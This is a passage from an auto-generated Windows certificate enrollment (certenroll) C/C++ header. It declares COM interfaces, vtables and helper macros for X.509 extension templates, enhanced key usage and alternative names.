    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionEnhancedKeyUsage_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionEnhancedKeyUsage_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionEnhancedKeyUsage_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionEnhancedKeyUsage_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionEnhancedKeyUsage_get_EnhancedKeyUsage(This,ppValue)	\
    ( (This)->lpVtbl -> get_EnhancedKeyUsage(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionEnhancedKeyUsage_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionTemplateName_INTERFACE_DEFINED__
#define __IX509ExtensionTemplateName_INTERFACE_DEFINED__

/* interface IX509ExtensionTemplateName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionTemplateName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab311-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionTemplateName : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionTemplateNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionTemplateName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionTemplateName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionTemplateName * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateName )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509ExtensionTemplateNameVtbl;

    interface IX509ExtensionTemplateName
    {
        CONST_VTBL struct IX509ExtensionTemplateNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionTemplateName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionTemplateName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionTemplateName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionTemplateName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionTemplateName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionTemplateName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionTemplateName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionTemplateName_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplateName_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionTemplateName_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionTemplateName_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionTemplateName_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionTemplateName_InitializeEncode(This,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeEncode(This,strTemplateName) ) 

#define IX509ExtensionTemplateName_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplateName_get_TemplateName(This,pValue)	\
    ( (This)->lpVtbl -> get_TemplateName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionTemplateName_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionTemplate_INTERFACE_DEFINED__
#define __IX509ExtensionTemplate_INTERFACE_DEFINED__

/* interface IX509ExtensionTemplate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionTemplate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab312-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionTemplate : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IObjectId *pTemplateOid,
            /* [in] */ LONG MajorVersion,
            /* [in] */ LONG MinorVersion) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateOid( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MajorVersion( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MinorVersion( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionTemplateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionTemplate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionTemplate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionTemplate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in_opt IObjectId *pTemplateOid,
            /* [in] */ LONG MajorVersion,
            /* [in] */ LONG MinorVersion);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateOid )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MajorVersion )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MinorVersion )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } IX509ExtensionTemplateVtbl;

    interface IX509ExtensionTemplate
    {
        CONST_VTBL struct IX509ExtensionTemplateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionTemplate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionTemplate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionTemplate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionTemplate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionTemplate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionTemplate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionTemplate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionTemplate_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplate_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionTemplate_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionTemplate_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionTemplate_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionTemplate_InitializeEncode(This,pTemplateOid,MajorVersion,MinorVersion)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pTemplateOid,MajorVersion,MinorVersion) ) 

#define IX509ExtensionTemplate_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplate_get_TemplateOid(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateOid(This,ppValue) ) 

#define IX509ExtensionTemplate_get_MajorVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_MajorVersion(This,pValue) ) 

#define IX509ExtensionTemplate_get_MinorVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_MinorVersion(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionTemplate_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0022 */
/* [local] */ 

typedef 
enum AlternativeNameType
    {
        XCN_CERT_ALT_NAME_UNKNOWN	= 0,
        XCN_CERT_ALT_NAME_OTHER_NAME	= 1,
        XCN_CERT_ALT_NAME_RFC822_NAME	= 2,
        XCN_CERT_ALT_NAME_DNS_NAME	= 3,
        XCN_CERT_ALT_NAME_DIRECTORY_NAME	= 5,
        XCN_CERT_ALT_NAME_URL	= 7,
        XCN_CERT_ALT_NAME_IP_ADDRESS	= 8,
        XCN_CERT_ALT_NAME_REGISTERED_ID	= 9,
        XCN_CERT_ALT_NAME_GUID	= 10,
        XCN_CERT_ALT_NAME_USER_PRINCIPLE_NAME	= 11
    } 	AlternativeNameType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0022_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0022_v0_0_s_ifspec;

#ifndef __IAlternativeName_INTERFACE_DEFINED__
#define __IAlternativeName_INTERFACE_DEFINED__

/* interface IAlternativeName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IAlternativeName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab313-217d-11da-b2a4-000e7bbb2b09")
    IAlternativeName : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromString( 
            /* [in] */ AlternativeNameType Type,
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromRawData( 
            /* [in] */ AlternativeNameType Type,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromOtherName( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData,
            /* [in] */ VARIANT_BOOL ToBeWrapped) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out AlternativeNameType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_StrValue( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IAlternativeNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IAlternativeName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IAlternativeName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IAlternativeName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IAlternativeName * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromString )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ AlternativeNameType Type,
            /* [in] */ __RPC__in BSTR strValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromRawData )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ AlternativeNameType Type,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromOtherName )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRawData,
            /* [in] */ VARIANT_BOOL ToBeWrapped);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IAlternativeName * This,
            /* [retval][out] */ __RPC__out AlternativeNameType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_StrValue )( 
            __RPC__in IAlternativeName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IAlternativeName * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IAlternativeName * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IAlternativeNameVtbl;

    interface IAlternativeName
    {
        CONST_VTBL struct IAlternativeNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IAlternativeName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IAlternativeName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IAlternativeName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IAlternativeName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IAlternativeName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IAlternativeName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IAlternativeName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IAlternativeName_InitializeFromString(This,Type,strValue)	\
    ( (This)->lpVtbl -> InitializeFromString(This,Type,strValue) ) 

#define IAlternativeName_InitializeFromRawData(This,Type,Encoding,strRawData)	\
    ( (This)->lpVtbl -> InitializeFromRawData(This,Type,Encoding,strRawData) ) 

#define IAlternativeName_InitializeFromOtherName(This,pObjectId,Encoding,strRawData,ToBeWrapped)	\
    ( (This)->lpVtbl -> InitializeFromOtherName(This,pObjectId,Encoding,strRawData,ToBeWrapped) ) 

#define IAlternativeName_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IAlternativeName_get_StrValue(This,pValue)	\
    ( (This)->lpVtbl -> get_StrValue(This,pValue) ) 

#define IAlternativeName_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IAlternativeName_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IAlternativeName_INTERFACE_DEFINED__ */


#ifndef __IAlternativeNames_INTERFACE_DEFINED__
#define __IAlternativeNames_INTERFACE_DEFINED__

/* interface IAlternativeNames */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IAlternativeNames;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab314-217d-11da-b2a4-000e7bbb2b09")
    IAlternativeNames : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeName **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IAlternativeName *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IAlternativeNamesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IAlternativeNames * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IAlternativeNames * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IAlternativeNames * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IAlternativeNames * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IAlternativeName **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IAlternativeNames * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IAlternativeNames * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ __RPC__in_opt IAlternativeName *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IAlternativeNames * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IAlternativeNames * This);
        
        END_INTERFACE
    } IAlternativeNamesVtbl;

    interface IAlternativeNames
    {
        CONST_VTBL struct IAlternativeNamesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


